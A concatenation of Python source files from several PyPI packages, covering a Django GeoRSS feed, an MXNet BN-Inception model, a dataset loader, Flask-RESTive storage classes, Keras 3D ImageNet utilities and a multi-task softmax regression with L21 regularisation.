self.add_georss_element(handler, self.feed, w3c_geo=True)
# ### Feed subclass ###
class Feed(BaseFeed):
"""
This is a subclass of the `Feed` from `django.contrib.syndication`.
This allows users to define a `geometry(obj)` and/or `item_geometry(item)`
methods on their own subclasses so that geo-referenced information may
placed in the feed.
"""
feed_type = GeoRSSFeed
def feed_extra_kwargs(self, obj):
return {"geometry": self._get_dynamic_attr("geometry", obj)}
def item_extra_kwargs(self, item):
return {"geometry": self._get_dynamic_attr("item_geometry", item)} | PypiClean |
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/mxnet/builtin_symbols/symbol_inception_bn.py | from .. import symbol
def ConvFactory(data, num_filter, kernel, stride=(1,1), pad=(0, 0), name=None, suffix=''):
conv = symbol.Convolution(data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, name='conv_%s%s' %(name, suffix))
bn = symbol.BatchNorm(data=conv, name='bn_%s%s' %(name, suffix))
act = symbol.Activation(data=bn, act_type='relu', name='relu_%s%s' %(name, suffix))
return act
def InceptionFactoryA(data, num_1x1, num_3x3red, num_3x3, num_d3x3red, num_d3x3, pool, proj, name):
# 1x1
c1x1 = ConvFactory(data=data, num_filter=num_1x1, kernel=(1, 1), name=('%s_1x1' % name))
# 3x3 reduce + 3x3
c3x3r = ConvFactory(data=data, num_filter=num_3x3red, kernel=(1, 1), name=('%s_3x3' % name), suffix='_reduce')
c3x3 = ConvFactory(data=c3x3r, num_filter=num_3x3, kernel=(3, 3), pad=(1, 1), name=('%s_3x3' % name))
# double 3x3 reduce + double 3x3
cd3x3r = ConvFactory(data=data, num_filter=num_d3x3red, kernel=(1, 1), name=('%s_double_3x3' % name), suffix='_reduce')
cd3x3 = ConvFactory(data=cd3x3r, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), name=('%s_double_3x3_0' % name))
cd3x3 = ConvFactory(data=cd3x3, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), name=('%s_double_3x3_1' % name))
# pool + proj
pooling = symbol.Pooling(data=data, kernel=(3, 3), stride=(1, 1), pad=(1, 1), pool_type=pool, name=('%s_pool_%s_pool' % (pool, name)))
cproj = ConvFactory(data=pooling, num_filter=proj, kernel=(1, 1), name=('%s_proj' % name))
# concat
concat = symbol.Concat(*[c1x1, c3x3, cd3x3, cproj], name='ch_concat_%s_chconcat' % name)
return concat
def InceptionFactoryB(data, num_3x3red, num_3x3, num_d3x3red, num_d3x3, name):
# 3x3 reduce + 3x3
c3x3r = ConvFactory(data=data, num_filter=num_3x3red, kernel=(1, 1), name=('%s_3x3' % name), suffix='_reduce')
c3x3 = ConvFactory(data=c3x3r, num_filter=num_3x3, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name=('%s_3x3' % name))
# double 3x3 reduce + double 3x3
cd3x3r = ConvFactory(data=data, num_filter=num_d3x3red, kernel=(1, 1), name=('%s_double_3x3' % name), suffix='_reduce')
cd3x3 = ConvFactory(data=cd3x3r, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name=('%s_double_3x3_0' % name))
cd3x3 = ConvFactory(data=cd3x3, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name=('%s_double_3x3_1' % name))
# pool + proj
pooling = symbol.Pooling(data=data, kernel=(3, 3), stride=(2, 2), pool_type="max", name=('max_pool_%s_pool' % name))
# concat
concat = symbol.Concat(*[c3x3, cd3x3, pooling], name='ch_concat_%s_chconcat' % name)
return concat
def get_symbol(num_classes=1000):
"""
Return the "BN-Inception" architecture for image classification
The network is suitable for images of size around 224 x 224
Parameters
----------
num_classes : int, optional
Number of classes in the ouptut layer.
References
----------
- Sergey Ioffe and Christian Szegedy. Batch normalization: Accelerating deep
network training by reducing internal covariate shift. arXiv preprint
arXiv:1502.03167, 2015.
"""
# data
data = symbol.Variable(name="data")
# stage 1
conv1 = ConvFactory(data=data, num_filter=64, kernel=(7, 7), stride=(2, 2), pad=(3, 3), name='conv1')
pool1 = symbol.Pooling(data=conv1, kernel=(3, 3), stride=(2, 2), name='pool1', pool_type='max')
# stage 2
conv2red = ConvFactory(data=pool1, num_filter=64, kernel=(1, 1), stride=(1, 1), name='conv2red')
conv2 = ConvFactory(data=conv2red, num_filter=192, kernel=(3, 3), stride=(1, 1), pad=(1, 1), name='conv2')
pool2 = symbol.Pooling(data=conv2, kernel=(3, 3), stride=(2, 2), name='pool2', pool_type='max')
# stage 2
in3a = InceptionFactoryA(pool2, 64, 64, 64, 64, 96, "avg", 32, '3a')
in3b = InceptionFactoryA(in3a, 64, 64, 96, 64, 96, "avg", 64, '3b')
in3c = InceptionFactoryB(in3b, 128, 160, 64, 96, '3c')
# stage 3
in4a = InceptionFactoryA(in3c, 224, 64, 96, 96, 128, "avg", 128, '4a')
in4b = InceptionFactoryA(in4a, 192, 96, 128, 96, 128, "avg", 128, '4b')
in4c = InceptionFactoryA(in4b, 160, 128, 160, 128, 160, "avg", 128, '4c')
in4d = InceptionFactoryA(in4c, 96, 128, 192, 160, 192, "avg", 128, '4d')
in4e = InceptionFactoryB(in4d, 128, 192, 192, 256, '4e')
# stage 4
in5a = InceptionFactoryA(in4e, 352, 192, 320, 160, 224, "avg", 128, '5a')
in5b = InceptionFactoryA(in5a, 352, 192, 320, 192, 224, "max", 128, '5b')
# global avg pooling
avg = symbol.Pooling(data=in5b, kernel=(7, 7), stride=(1, 1), name="global_pool", pool_type='avg')
# linear classifier
flatten = symbol.Flatten(data=avg, name='flatten')
fc1 = symbol.FullyConnected(data=flatten, num_hidden=num_classes, name='fc1')
softmax = symbol.SoftmaxOutput(data=fc1, name='softmax')
return softmax | PypiClean |
/observations-0.1.4.tar.gz/observations-0.1.4/observations/r/salinity.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def salinity(path):
"""Water Salinity and River Discharge
The `salinity` data frame has 28 rows and 4 columns.
Biweekly averages of the water salinity and river discharge in Pamlico
Sound, North Carolina were recorded between the years 1972 and 1977. The
data in this set consists only of those measurements in March, April and
May.
This data frame contains the following columns:
`sal`
The average salinity of the water over two weeks.
`lag`
The average salinity of the water lagged two weeks. Since only
spring is used, the value of `lag` is not always equal to the
previous value of `sal`.
`trend`
A factor indicating in which of the 6 biweekly periods between March
and May, the observations were taken. The levels of the factor are
from 0 to 5 with 0 being the first two weeks in March.
`dis`
The amount of river discharge during the two weeks for which `sal`
is the average salinity.
The data were obtained from
Ruppert, D. and Carroll, R.J. (1980) Trimmed least squares estimation in
the linear model. *Journal of the American Statistical Association*,
**75**, 828–838.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `salinity.csv`.
Returns:
Tuple of np.ndarray `x_train` with 28 rows and 4 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'salinity.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/boot/salinity.csv'
maybe_download_and_extract(path, url,
save_file_name='salinity.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata | PypiClean |
/Flask-RESTive-0.0.3.tar.gz/Flask-RESTive-0.0.3/flask_restive/services.py | from __future__ import unicode_literals
from flask import current_app
from flask_restive.schema_opts import PrimaryKeySchemaOpts
from flask_restive.params import SliceParams
from flask_restive.exceptions import DoesNotExist
class Service(object):
"""
The abstract service class.
Provides methods to initialize and finalize the service session:
- open
- close
Can be used in with statement also:
with Service() as service:
storage.do_something()
"""
OPTIONS_CLASS = PrimaryKeySchemaOpts
opts = None
app = None
def __init__(self, *args, **kwargs):
super(Service, self).__init__(*args, **kwargs)
meta = self.__class__.__dict__.get('Meta')
setattr(self.__class__, 'opts', self.OPTIONS_CLASS(meta))
setattr(self.__class__, 'app', current_app)
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close(exc_val)
return exc_type is None
def open(self):
raise NotImplementedError
def close(self, exception=None):
raise NotImplementedError
def wrap_data(self, *args, **kwargs):
"""
This method should be called for each item
returned by service methods.
:param args: the first argument is data
returned by service method
:param kwargs: key-value attributes for
manual creation
:return: wrapped data
:rtype: flask_restive.params.Params
"""
return self.opts.wrap_data(*args, **kwargs)
class Storage(Service):
"""
The abstract base storage class. Provides methods to manage data:
- get_item
- get_count
- get_list
- create_item
- create_list
- update_item
- update_list
- delete_list
Provides methods to initialize and finalize the storage session:
- open
- close
Can be used in with statement also:
with Storage() as storage:
filter_params = Params(id=1, primary_key_fields=('id',))
item = storage.get_item(filter_params=filter_params)
"""
def get_item(self, filter_params, **kwargs):
"""
Get one item by filter. Filter should contain primary key.
The found item should be wrapped in Params class and
should contain primary key.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options, to be forwarded to get_list method
:return: found item
:rtype: flask_restive.params.Params
"""
items = self.get_list(filter_params=filter_params,
slice_params=SliceParams(limit=1), **kwargs)
if not items:
raise DoesNotExist
assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def get_count(self, filter_params=None, **kwargs):
"""
Get count of items by filter.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options
:return: count of found items
:rtype: int
"""
raise NotImplementedError
def get_list(self, filter_params=None, slice_params=None,
sorting_params=None, **kwargs):
"""
Get list of items by filter, can be sliced and sorted.
Each of found item should be wrapped in Params class and
should contain primary key.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param slice_params: slice (paging) parameters
:type slice_params: flask_restive.params.SliceParams
:param sorting_params: sorting parameters
:type sorting_params: flask_restive.params.SortingParams
:param kwargs: options
:return: found items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def create_item(self, data_params, **kwargs):
"""
Create one item. Data params should contain primary key.
The created item should be wrapped in Params class and
should contain primary key.
:param data_params: item data
:type data_params: flask_restive.params.Params
:param kwargs: options
:return: created item
:rtype: flask_restive.params.Params
"""
items = self.create_list(data_params=[data_params], **kwargs)
assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def create_list(self, data_params, **kwargs):
"""
Create list of items. Each item should contain primary key.
Each of created item should be wrapped in Params class and
should contain primary key.
:param data_params: items data to create,
list of flask_restive.params.Params
:type data_params: list
:param kwargs: options
:return: created items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def update_item(self, data_params, **kwargs):
"""
Update one item. Data params should contain primary key.
The rest of item parameters are values to update.
The updated item should be wrapped in Params class and
should contain primary key.
:param data_params: item to update
:type data_params: flask_restive.params.Params
:param kwargs: options
:return: updated item
:rtype: flask_restive.params.Params
"""
items = self.update_list(data_params=[data_params], **kwargs)
assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def update_list(self, data_params, **kwargs):
"""
Update list of items. Each of items to update should contain
primary key. The rest of item parameters are values to update.
Each updated item should be wrapped in Params class and
should contain primary key.
:param data_params: items to update,
list of flask_restive.params.Params
:type data_params: list
:param kwargs: options
:return: updated items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def delete_list(self, filter_params=None, **kwargs):
"""
Delete list of items by filter.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options
"""
raise NotImplementedError | PypiClean |
/Keras_Applications_3D-0.1.0-py3-none-any.whl/keras_applications_3d/imagenet_utils.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import warnings
import numpy as np
from . import get_submodules_from_kwargs
from tensorflow.python.keras import activations
CLASS_INDEX = None
CLASS_INDEX_PATH = ('https://storage.googleapis.com/download.tensorflow.org/'
'data/imagenet_class_index.json')
def _preprocess_numpy_input(x, data_format, mode, **kwargs):
"""Preprocesses a Numpy array encoding a batch of images.
# Arguments
x: Input array, 3D or 4D.
data_format: Data format of the image array.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed Numpy array.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if not issubclass(x.dtype.type, np.floating):
x = x.astype(backend.floatx(), copy=False)
if mode == 'tf':
x /= 127.5
x -= 1.
return x
if mode == 'torch':
x /= 255.
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
else:
if data_format == 'channels_first':
# 'RGB'->'BGR'
if x.ndim == 3:
x = x[::-1, ...]
else:
x = x[:, ::-1, ...]
else:
# 'RGB'->'BGR'
x = x[..., ::-1]
mean = [103.939, 116.779, 123.68]
std = None
# Zero-center by mean pixel
if data_format == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= mean[0]
x[1, :, :] -= mean[1]
x[2, :, :] -= mean[2]
if std is not None:
x[0, :, :] /= std[0]
x[1, :, :] /= std[1]
x[2, :, :] /= std[2]
else:
x[:, 0, :, :] -= mean[0]
x[:, 1, :, :] -= mean[1]
x[:, 2, :, :] -= mean[2]
if std is not None:
x[:, 0, :, :] /= std[0]
x[:, 1, :, :] /= std[1]
x[:, 2, :, :] /= std[2]
else:
x[..., 0] -= mean[0]
x[..., 1] -= mean[1]
x[..., 2] -= mean[2]
if std is not None:
x[..., 0] /= std[0]
x[..., 1] /= std[1]
x[..., 2] /= std[2]
return x
def _preprocess_symbolic_input(x, data_format, mode, **kwargs):
"""Preprocesses a tensor encoding a batch of images.
# Arguments
x: Input tensor, 3D or 4D.
data_format: Data format of the image tensor.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed tensor.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if mode == 'tf':
x /= 127.5
x -= 1.
return x
if mode == 'torch':
x /= 255.
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
else:
if data_format == 'channels_first':
# 'RGB'->'BGR'
if backend.ndim(x) == 3:
x = x[::-1, ...]
else:
x = x[:, ::-1, ...]
else:
# 'RGB'->'BGR'
x = x[..., ::-1]
mean = [103.939, 116.779, 123.68]
std = None
mean_tensor = backend.constant(-np.array(mean))
# Zero-center by mean pixel
if backend.dtype(x) != backend.dtype(mean_tensor):
x = backend.bias_add(
x, backend.cast(mean_tensor, backend.dtype(x)),
data_format=data_format)
else:
x = backend.bias_add(x, mean_tensor, data_format)
if std is not None:
x /= std
return x
def preprocess_input(x, data_format=None, mode='caffe', **kwargs):
"""Preprocesses a tensor or Numpy array encoding a batch of images.
# Arguments
x: Input Numpy or symbolic tensor, 3D or 4D.
The preprocessed data is written over the input data
if the data types are compatible. To avoid this
behaviour, `numpy.copy(x)` can be used.
data_format: Data format of the image tensor/array.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed tensor or Numpy array.
# Raises
ValueError: In case of unknown `data_format` argument.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if data_format is None:
data_format = backend.image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format ' + str(data_format))
if isinstance(x, np.ndarray):
return _preprocess_numpy_input(x, data_format=data_format,
mode=mode, **kwargs)
else:
return _preprocess_symbolic_input(x, data_format=data_format,
mode=mode, **kwargs)
def decode_predictions(preds, top=5, **kwargs):
"""Decodes the prediction of an ImageNet model.
# Arguments
preds: Numpy tensor encoding a batch of predictions.
top: Integer, how many top-guesses to return.
# Returns
A list of lists of top class prediction tuples
`(class_name, class_description, score)`.
One list of tuples per sample in batch input.
# Raises
ValueError: In case of invalid shape of the `pred` array
(must be 2D).
"""
global CLASS_INDEX
backend, _, _, keras_utils = get_submodules_from_kwargs(kwargs)
if len(preds.shape) != 2 or preds.shape[1] != 1000:
raise ValueError('`decode_predictions` expects '
'a batch of predictions '
'(i.e. a 2D array of shape (samples, 1000)). '
'Found array with shape: ' + str(preds.shape))
if CLASS_INDEX is None:
fpath = keras_utils.get_file(
'imagenet_class_index.json',
CLASS_INDEX_PATH,
cache_subdir='models',
file_hash='c2c37ea517e94d9795004a39431a14cb')
with open(fpath) as f:
CLASS_INDEX = json.load(f)
results = []
for pred in preds:
top_indices = pred.argsort()[-top:][::-1]
result = [tuple(CLASS_INDEX[str(i)]) + (pred[i],) for i in top_indices]
result.sort(key=lambda x: x[2], reverse=True)
results.append(result)
return results
def obtain_input_shape(input_shape,
default_size,
min_size,
data_format,
require_flatten,
weights=None):
"""Internal utility to compute/validate a model's input shape.
# Arguments
input_shape: Either None (will return the default network input shape),
or a user-provided shape to be validated.
default_size: Default input width/height for the model.
min_size: Minimum input width/height accepted by the model.
data_format: Image data format to use.
require_flatten: Whether the model is expected to
be linked to a classifier via a Flatten layer.
weights: One of `None` (random initialization)
or 'imagenet' (pre-training on ImageNet).
If weights='imagenet' input channels must be equal to 3.
# Returns
An integer shape tuple (may include None entries).
# Raises
ValueError: In case of invalid argument values.
"""
if weights != 'imagenet' and input_shape and len(input_shape) == 3:
if data_format == 'channels_first':
if input_shape[0] not in {1, 3}:
warnings.warn(
'This model usually expects 1 or 3 input channels. '
'However, it was passed an input_shape with ' +
str(input_shape[0]) + ' input channels.')
default_shape = (input_shape[0], default_size, default_size)
else:
if input_shape[-1] not in {1, 3}:
warnings.warn(
'This model usually expects 1 or 3 input channels. '
'However, it was passed an input_shape with ' +
str(input_shape[-1]) + ' input channels.')
default_shape = (default_size, default_size, input_shape[-1])
else:
if data_format == 'channels_first':
default_shape = (3, default_size, default_size)
else:
default_shape = (default_size, default_size, 3)
if weights == 'imagenet' and require_flatten:
if input_shape is not None:
if input_shape != default_shape:
raise ValueError('When setting `include_top=True` '
'and loading `imagenet` weights, '
'`input_shape` should be ' +
str(default_shape) + '.')
return default_shape
if input_shape:
if data_format == 'channels_first':
if input_shape is not None:
if len(input_shape) != 3:
raise ValueError(
'`input_shape` must be a tuple of three integers.')
if input_shape[0] != 3 and weights == 'imagenet':
raise ValueError('The input must have 3 channels; got '
'`input_shape=' + str(input_shape) + '`')
if ((input_shape[1] is not None and input_shape[1] < min_size) or
(input_shape[2] is not None and input_shape[2] < min_size)):
raise ValueError('Input size must be at least ' +
str(min_size) + 'x' + str(min_size) +
'; got `input_shape=' +
str(input_shape) + '`')
else:
if input_shape is not None:
if len(input_shape) != 4:
raise ValueError(
'`input_shape` must be a tuple of fore integers.')
# if input_shape[-1] != 4 and weights == 'imagenet':
# raise ValueError('The input must have 4 channels; got '
# '`input_shape=' + str(input_shape) + '`')
if weights != None:
raise ValueError('We don\'t have any pre-trained weight yet.')
if ((input_shape[0] is not None and input_shape[0] < min_size) or
(input_shape[1] is not None and input_shape[1] < min_size) or
(input_shape[2] is not None and input_shape[2] < min_size)) :
raise ValueError('Input size must be at least ' +
str(min_size) + 'x' + str(min_size) + 'x' + str(min_size) +
'; got `input_shape=' +
str(input_shape) + '`')
else:
if require_flatten:
input_shape = default_shape
else:
if data_format == 'channels_first':
input_shape = (3, None, None)
else:
input_shape = (None, None, 3)
if require_flatten:
if None in input_shape:
raise ValueError('If `include_top` is True, '
'you should specify a static `input_shape`. '
'Got `input_shape=' + str(input_shape) + '`')
return input_shape
def correct_pad(inputs, kernel_size):
"""Returns a tuple for zero-padding for 2D convolution with downsampling.
Args:
inputs: Input tensor.
kernel_size: An integer or tuple/list of 2 integers.
Returns:
A tuple.
"""
# will be needed???
# backend, _, _, keras_utils = get_submodules_from_kwargs(kwargs)
img_dim = 2 if backend.image_data_format() == 'channels_first' else 1
input_size = backend.int_shape(inputs)[img_dim:(img_dim + 2)]
if isinstance(kernel_size, int):
kernel_size = (kernel_size, kernel_size)
if input_size[0] is None:
adjust = (1, 1)
else:
adjust = (1 - input_size[0] % 2, 1 - input_size[1] % 2)
correct = (kernel_size[0] // 2, kernel_size[1] // 2)
return ((correct[0] - adjust[0], correct[0]),
(correct[1] - adjust[1], correct[1]))
def validate_activation(classifier_activation, weights):
"""validates that the classifer_activation is compatible with the weights.
Args:
classifier_activation: str or callable activation function
weights: The pretrained weights to load.
Raises:
ValueError: if an activation other than `None` or `softmax` are used with
pretrained weights.
"""
if weights is None:
return
classifier_activation = activations.get(classifier_activation)
if classifier_activation not in {
activations.get('softmax'),
activations.get(None)
}:
raise ValueError('Only `None` and `softmax` activations are allowed '
'for the `classifier_activation` argument when using '
'pretrained weights, with `include_top=True`') | PypiClean |
/MD_MTL-0.0.9-py3-none-any.whl/Vampyr_MTL/functions/MTL_Softmax_L21.py | import numpy as np
from .init_opts import init_opts
from numpy import linalg as LA
from tqdm import tqdm
from tqdm import trange
import sys
import time
from ..evaluations.utils import opts
class MTL_Softmax_L21:
"""MTL multiclass logistic regression with hinge loss and L21 penalty
"""
def __init__(self, opts, rho1=0.01):
"""Initialization of MTL multiclass classification function
Args:
opts (opts): initalization class from opts
rho1 (int, optional): L2,1-norm group Lasso parameter. Defaults to 0.01
"""
self.opts = init_opts(opts)
self.rho1 = rho1
self.rho_L2 = 0
if hasattr(opts, 'rho_L2'):
rho_L2 = opts.rho_L2
def fit(self, X, Y, **kwargs):
"""Fit with training samples and train
t: task number
n: number of entries
d: data dimension
Args:
X ([np.array(np.array)]): t x n x d.
Y ([np.array(np.array)]): t x n x 1.
"""
self.task_num = len(X)
_, self.dimension = X[0].shape
task_num = self.task_num
dimension = self.dimension
if 'rho' in kwargs.keys():
print(kwargs)
self.rho1 = kwargs['rho']
X_new = []
for i in range(len(X)):
X_new.append(np.transpose(X[i]))
X = X_new
# y type check:
dt =Y[0].dtype
Y_new = []
m=0
if(np.issubdtype(dt, np.number)):
m = max(np.max(i) for i in Y)+1
self.encode_mtx = None
elif(np.issubdtype(dt, np.character) or np.issubdtype(dt, np.object)):
unq = set([])
for t in range(self.task_num):
unq = unq.union(set(Y[t]))
self.encode_mtx = {j:i for i,j in enumerate(unq)} # check encoding seq
self.decode_mtx = {i:j for i,j in enumerate(unq)} # decode the seq
m = len(unq)
# change Y str to num, make a copy of Y to avoid addr change
Y_cp=[0]*self.task_num
for t in range(self.task_num):
tmp_y = []
for j in Y[t]:
tmp_y.append(self.encode_mtx[j])
Y_cp[t] = np.array(tmp_y)
Y=Y_cp
else:
raise TypeError('Invalid target type')
self.encoding = m
for t in range(self.task_num):
s = int(Y[t].size)
Y_new_t = np.zeros((s, m))
Y_new_t[np.arange(s),Y[t]] = 1
Y_new.append(Y_new_t)
Y_old = Y
Y = Y_new
self.X = X
self.Y = Y
# transpose X to size: t x d x n
# encoding Y to size: t x n x m
funcVal = []
C0_prep = np.zeros((task_num, self.encoding))
for t_idx in range(task_num):
m1 = np.count_nonzero(Y_old[t_idx]==1)
m2 = np.count_nonzero(Y_old[t_idx]==-1)
if(m1==0 or m2==0):
# inbalanced label
C0_prep[t_idx] = 0
else:
C0_prep[t_idx] = np.log(m1/m2)
if self.opts.init==2:
W0 = np.zeros((dimension, task_num, self.encoding))
C0 = np.zeros((task_num, self.encoding))
elif self.opts.init == 0:
W0 = np.random.randn(dimension, task_num, self.encoding)
C0 = C0_prep
else:
if hasattr(self.opts,'W0'):
W0=self.opts.W0
if(W0.shape!=(dimension, task_num, self.encoding)):
raise TypeError('\n Check input W0 size')
else:
W0 = np.zeros((dimension, task_num, self.encoding))
if hasattr(self.opts, 'C0'):
C0 = self.opts.C0
else:
C0 = C0_prep
# this flag checks if gradient descent only makes significant step
bFlag=0
Wz= W0
Cz = C0
Wz_old = W0
Cz_old = C0
t = 1
t_old = 0
gamma = 1
gamma_inc = 2
for it in trange(self.opts.maxIter, file=sys.stdout, desc='outer loop'):
alpha = (t_old - 1)/t
Ws = (1 + alpha) * Wz - alpha * Wz_old
Cs = (1 + alpha) * Cz - alpha * Cz_old
gWs, gCs, Fs = self.gradVal_eval(Ws, Cs)
for in_it in trange(1000,file=sys.stdout, leave=False, unit_scale=True, desc='inner loop'):
Wzp = self.FGLasso_projection(Ws - gWs/gamma, self.rho1 / gamma)
Czp = Cs - gCs/gamma
Fzp = self.funVal_eval(Wzp, Czp)
delta_Wzp = Wzp - Ws
delta_Czp = Czp - Cs
nrm_delta_Wzp = LA.norm(delta_Wzp)**2
nrm_delta_Czp = LA.norm(delta_Czp)**2
r_sum = (nrm_delta_Czp + nrm_delta_Wzp)/2
Fzp_gamma = Fs + np.sum(delta_Wzp*gWs) + np.sum(delta_Czp*gCs)+ gamma/2 * r_sum*2
if (r_sum <=1e-20):
bFlag=1 # this shows that, the gradient step makes little improvement
break
if (Fzp <= Fzp_gamma):
break
else:
gamma = gamma * gamma_inc
Wz_old = Wz
Cz_old = Cz
Wz = Wzp
Cz = Czp
funcVal.append(Fzp + self.nonsmooth_eval(Wz, self.rho1))
if (bFlag):
print('\n The program terminates as the gradient step changes the solution very small.')
break
if(self.opts.tFlag == 0):
if it>=2:
if (abs( funcVal[-1] - funcVal[-2]) <= self.opts.tol):
break
elif(self.opts.tFlag == 1):
if it>=2:
if (abs( funcVal[-1] - funcVal[-2] ) <= self.opts.tol* funcVal[-2]):
break
elif(self.opts.tFlag == 2):
if ( funcVal[-1]<= self.opts.tol):
break
elif(self.opts.tFlag == 3):
if it>=self.opts.maxIter:
break
t_old = t
t = 0.5 * (1 + (1+ 4 * t**2)**0.5)
self.W = Wzp
self.funcVal = funcVal
def FGLasso_projection (self, D, lmbd):
"""Lasso projection for panelties
Args:
D (np.array(np.array)): Weight matrix
lmbd (int): panelties param
Returns:
(np.array(np.array)): panelties
"""
# l2.1 norm projection.
ss = np.sum(D**2,axis=1)
sq = np.sqrt(ss.astype(float))
# of shape: d x m, sum in direction of task t
tmp = np.tile(np.maximum(0, 1 - lmbd/sq),(D.shape[1], 1, 1)).transpose(1,0,2)
return tmp*D
# smooth part gradient.
def gradVal_eval(self, W, C):
"""Gradient Decent
Args:
W (np.array(np.array)): Weight Matrix with shape (d, t)
C (np.array): intercept Matrix with shape (t, 1)
Returns:
grad_W (np.array(np.array)): gradient matrix of weight, shape (d, t)
"""
grad_W = np.zeros((self.dimension, self.task_num, self.encoding))
grad_C = np.zeros((self.task_num, self.encoding))
lossValVect = np.zeros((1, self.task_num))
if self.opts.pFlag:
# grad_W = zeros(zeros(W));
# parfor i = 1:task_num
# grad_W (i, :) = X{i}*(X{i}' * W(:,i)-Y{i})
pass
else:
for i in range(self.task_num):
grad_W[:,i], grad_C[i], lossValVect[:,i] = self.unit_grad_eval(W[:,i], C[i], i)
grad_W = grad_W+ self.rho_L2 * 2 * W
funcVal = np.sum(lossValVect) + self.rho_L2 * LA.norm(W)**2
return grad_W, grad_C, funcVal
def funVal_eval(self, W, C):
"""Loss Accumulation
Args:
W ([np.array(np.array)]): weight matrix of shape (n, d, t)
C ([np.array]): intercept Matrix with shape (t, n, 1)
Returns:
funcval (float): loss
"""
funcVal = 0
if self.opts.pFlag:
# parfor i = 1: task_num
# funcVal = funcVal + 0.5 * norm (Y{i} - X{i}' * W(:, i))^2;
# end
pass
else:
for i in range(self.task_num):
funcVal = funcVal + self.unit_funcVal_eval(W[:,i], C[i], i)
funcVal = funcVal + self.rho_L2 * LA.norm(W)**2
return funcVal
def nonsmooth_eval(self, W, rho_1):
"""non-smooth loss evaluation
Args:
W (np.array(np.array)): weight matrix of shape (d, t)
rho1 (float): L2,1-norm group Lasso parameter
Returns:
(float): loss
"""
non_smooth_value = 0
if self.opts.pFlag:
pass
else:
for i in range(self.dimension):
w = W[i, :]
non_smooth_value = non_smooth_value+ rho_1 * LA.norm(w, ord=2)
return non_smooth_value
def unit_grad_eval(self, w, c, task_idx):
"""Gradient decent in individual tasks
Args:
w (np.array): weight matrix of shape (d, 1), corresponding to individual task
c (int): intercept Matrix with shape (1), corresponding to individual task
task_idx (int): task index
Returns:
(np.array): gradient weight array
(int): gradient intercept
(int): task individual loss
"""
weight = np.ones((1, self.Y[task_idx].shape[0]))/self.task_num
weighty = 1/self.task_num * self.Y[task_idx]
_, n = self.X[task_idx].shape
z = -self.Y[task_idx]*(np.transpose(self.X[task_idx])@w + np.tile(c, (n, 1)))
hinge = np.maximum(z, 0)
funcVal = np.sum((weight @ (np.log(np.exp(-hinge)+np.exp(z-hinge))+hinge)))
prob = 1./(1+np.exp(z))
z_prob = -weighty*(1-prob)
grad_c = np.sum(z_prob)
grad_w = self.X[task_idx]@z_prob
return grad_w, grad_c, funcVal
def unit_funcVal_eval(self, w, c, task_idx):
"""individual loss in each task
Args:
w (np.array): weight matrix of shape (d, 1), corresponding to individual task
c (int): intercept Matrix with shape (1), corresponding to individual task
task_idx (int): task index
Returns:
(int): individual loss
"""
weight = np.ones((1, self.Y[task_idx].shape[0]))/self.task_num
z = -self.Y[task_idx]*(np.transpose(self.X[task_idx])@w + c)
hinge = np.maximum(z, 0)
funcVal = np.sum(weight @ (np.log(np.exp(-hinge)+np.exp(z-hinge))+hinge))
return funcVal
def get_params(self, deep = False):
"""Get inbult initalization params
Args:
deep (bool, optional): deep traverse. Defaults to False.
Returns:
(dict): dictionary of all inits
"""
return {'rho1':self.rho1, 'opts':self.opts}
def _trained_parames(self):
